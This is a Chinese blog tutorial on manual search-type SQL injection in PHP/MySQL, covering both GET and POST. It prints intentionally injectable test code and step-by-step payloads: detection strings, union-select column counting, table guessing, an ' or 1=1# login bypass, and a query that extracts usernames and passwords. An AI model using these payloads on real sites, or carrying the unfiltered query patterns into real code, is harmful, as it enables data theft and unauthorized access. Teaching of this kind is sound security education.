mysql搜索型注入_SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)

最新推荐文章于 2023-07-19 15:46:41 发布
最新推荐文章于 2023-07-19 15:46:41 发布
阅读量216 收藏
点赞数
文章标签: mysql搜索型注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39668965/article/details/113208290
版权

一、搜索型注入简介与原理

1)简介

一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:

其中又分为POST/GET,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索型注入又称为文本框注入。

2)原理

$sql="select * from user where password like '%$pwd%' order by password";

这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。但是如果有人输入这样的内容呢?

'and 1=1 and '%'='

这样的话这句SQL语句就变成了这样

select * from user where password like '%fendo'and 1=1 and '%'='%' order by password

存在SQL注入。

二、搜索型注入判断

判断搜索型注入的方法:

1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;

2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;

3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况

4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况

5 根据两次的返回情况来判断是不是搜索型文本框注入了

下面这几种语句都可以:

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='

三、搜索型注入实战

1)GET型注入

测试源码:

$pwd=$_GET['pwd'];

$conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库

if($conn){

echo "连接数据库成功!";

}//判断连接是否成功

echo "
";

mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库(fendo)

$sql="select * from user where password like '%$pwd%' order by password"; //字符型搜索语句

$result=mysql_query($sql);

while($row = mysql_fetch_array($result)){

echo "用户ID:".$row['id']."
";

echo "用户名:".$row['username']."
";

echo "用户密码:".$row['password']."
";

echo "用户邮箱:".$row['email']."
";

}

mysql_close($conn); //关闭数据库连接

echo "

";

echo "你当前执行的sql语句为:"."
";

echo $sql;

?>

1.判断字段数

语句:

%' union select 1,2,3,4,...... and '%'='

fbb298e1029aff02bd2cad1950243d02.png

还有种方法

语句:

%' and exists (select id from user where LENGTH(username)<6 and id=1) and '%'='

把6这个数字逐次更换,直到他不报错为止。如下当它小于6时正确,说明字段数为5。

309876abfb420ba0ac28305ba6a2fab7.png

2.判断表名

语句:

%'and(select count(*)from admin)>0 and '%'='

把admin这个表名逐次更换,直到他不报错为止,就说明这个表存在。

4129caa35d544dc1b2c831283d29770c.png

3.猜解密码

由于这里用的就是密码,所以这里换成猜解用户名

2)POST型注入

测试源码

//--------------------------post处理--------------------------------//

$name=addslashes($_POST['n']);

$pass=addslashes($_POST['p']);

$conn = mysql_connect('127.0.0.1','root','123');

if($conn){

echo "mysql连接成功";

echo "

";

}

mysql_select_db('fendo',$conn);

$sql="select * from user where username='$name' and password='$pass'";

$result=mysql_query($sql);

mysql_close($conn);

while($row = mysql_fetch_array($result)){

echo "用户ID:".$row['id']."
";

echo "用户名:".$row['username']."
";

echo "用户密码:".$row['password']."
";

}

echo "当前执行的sql语句:".$sql;

?>

账号:

密码:

66b82fadca03494f5045929b33beef0d.png

1.判断是否存在SQL注入

用PHP万能密码进行测试

' or 1=1#

在用户名里输入万能密码如果没报错,就说明存在SQL注入。

4b7a19343d1bc411cfe83534baacb224.png

2.猜字段数

' order by 4#

逐次更改数字去猜,直到不报错为止。

bf921c5db2acb1cd819a9577de82c9d8.png

3.猜表名

'or 1=1 union select 1,2,3,4 #

逐次累加数字,直到不报错为止。

8da8efe4578d4d18d08f47a5ff385624.png

4.猜内容

替换1,2,3为你想要获得的内容

'or 1=1 union select username,password,3,4 from user#

c1e539d67510f1fb8d511d86e7984d69.png

weixin_39668965
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
易语言PHP+mysql中间件
07-18
易语言PHP+mysql中间件源码,PHP+mysql中间件,SQL_执行语句,SQL_取记录数,SQL_添加数据,SQL_修改数据,SQL_删除数据,SQL_查询数据,GET_CLIENT_RAND,GET_SERVER_RAND,HTTP_数据解密,HTTP_数据加密,RANDS,时间到时间戳,...
SQL注入——搜索注入
zjdda的博客
05-30 6945
搜索注入原理 语句构造
SQL注入搜索注入
qxx5203的博客
07-22 2469
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字还是字符。账号密码错误或用户未注册!搜索框内输入a正常回显。...
SQL注入系列PHP+Mysql手动注入()----搜索(POST/GET)
热门推荐
fendo
02-26 1万+
一、搜索注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
SQL注入(pikachu)字符注入搜索注入
weixin_54431413的博客
03-07 1125
注意:前面加上'进行闭合,中间是判断列数的sql语句,后面的注释掉 在url中要这么写 1'+union+select+1%2C2%23或者 1'+union+select+1,2--+
网络安全之pikachu搜索注入实战
weixin_44255593的博客
03-03 755
实例讲解: 1.搜索注入漏洞产生的原因:   在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索注入漏洞,又称文本框注入。 2.搜索注入的类:   同其他注入相同,由于提交表单的不同,可分为GET(多出现于网站上的搜索)和POST(多出现于用户名的登录搜索匹配),搜索注入是国内系统中普遍存在的漏洞。 3.原理分析: select username,id,email from member where usern
Win2003服务器防SQL注入神器–D盾_IIS防火墙
01-10
D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL),看到这边的策略,主要的测试思路: a、白名单 b、绕过union select或...
post-nodejs-mysql:关于 NodeJs 和 MySQLPost 存储库
06-11
post-nodejs-mysql 要测试应用程序,请下载存储库: git clone https://github.com/nicholasess/post-nodejs-mysql安装依赖: npm install将remote.sql 文件导入到您的数据库中。 更改app.js文件中的值,导入你在...
Structured-query-Language-injection:SQL注入自动工具
06-15
Structured-query-Language-injection SQL注入自动工具: 多用途 MySQL 注入工具功能 *联合注入 *盲注 *post 和 get 方法注入 ** POST 不工作 *full information_schema enumeration *table and column fuzzer *...
php简单实现sql防注入的方法
12-18
本文实例讲述了php简单实现sql...$_POST = sql_injection($_POST); $_GET = sql_injection($_GET); function sql_injection($content) { if (!get_magic_quotes_gpc()) { if (is_array($content)) { foreach ($content
常见的web漏洞之 sql注入
weixin_47399833的博客
11-17 1533
简单学习一下网络安全啦
搜索注入
weixin_30265171的博客
11-07 671
======================================================= 前段时间朋友丢了一个站过来,说是他们学校的。叫我帮忙检测下。 于是看了下。用扫描器扫了下,没有啥可以上传利用的,发现后台,默认和万能密码无效, 无注入点,手工和工具试过了,防注入,COOKIES注入也不行。找不到程序源码,没办法分析。旁注 ? 整站是独立服务器,就一个站,旁注也没办法。难...
mysql搜索注入_pikachu-搜索注入 #手工注入
weixin_28745525的博客
02-28 310
1.搜索注入漏洞产生的原因:在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索注入漏洞,又称文本框注入。2.搜索注入的类:同其他注入相同,由于提交表单的不同,可分为GET(多出现于网站上的搜索)和POST(多出现于用户名的登录搜索匹配),搜索注入是国内系统中普遍存在的漏洞。3.原理分析:select us...
pikachu之搜索注入
weixin_43622525的博客
03-07 6779
目录 pikachu 简介 搭建 windows Docker SQL注入 搜索注入 pikachu 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 搭建 windows 搭建phpstudy环境,将pikachu解压在网站根目录进行搭建。 Docker docker build -t "pikachu" . docker run
mysql搜索注入_各类注入汇总及简单绕过思路
weixin_33751197的博客
02-08 381
数字注入:www.secist.com/news.asp?id=11select * from news where id=11www.secist.com/news.asp?id=11 and 1=1select * from news where id=11 and 1=1字符注入:www.secist.com/news.asp?id=你好select * from news where ...
记一次搜索注入
super_m@n的博客
01-09 564
1.起因 还是和往常一样,看见index.php?id=1这样的界面顺手就想来个and 1=1 ,结果没反应,试试其他的大小写 内联注释 多次编码注入均失败,我望着页面的无效参数陷入了深思,难道这个网站真的没有一丝可以利用的地方,我告诉自己不可能,肯定是自己能力不够还不足以发现页面的漏洞,既然sql不行那就找找xss csrf等漏洞,皇天不负有心人,在搜索框输入"><img src=...
经典的注入语句
数据库天地
10-04 138
经典的注入语句 注意:对于普通的get注入,如果是字符,前加' 后加 and ''=' 拆半法 ###################################### and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。 and exists (s...
Pickachu第四弹:SQL注入
Pisces_mango的博客
09-03 1021
目录 一、数字注入post) 二、字符输入(get) 搜索注入 四、xx注入 五、“insert/update”注入 六、“delete”注入 七、“http header”注入 八、盲注(base on boolian) 九、盲注(base on time) 十、宽字节注入 十一、手工测试流程 十二、报错利用流程 一、数字注入post) 看到输入点后,我们想象一下它在数据库中是怎样操作的,select 字段1,字段2 from 表名 where id=1
SQL注入(二):字符+搜索+ XX+insert/update
最新发布
NSQ0207的博客
07-19 280
1、使用 ' 进行测试2、使用order by 测试有几个字段3、使用union select 1,2 查看字段。
php mysql上传视频_使用PHP / MySQL将视频上传到文件夹中,并将其链接到数据库
06-07
<form method="post" enctype="multipart/form-data"> </form> ``` 2. 在 PHP 中处理上传的视频文件。您需要检查上传的文件是否存在并且是允许的视频类(例如MP4,AVI等)。然后,将视频文件移动到服务器上的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值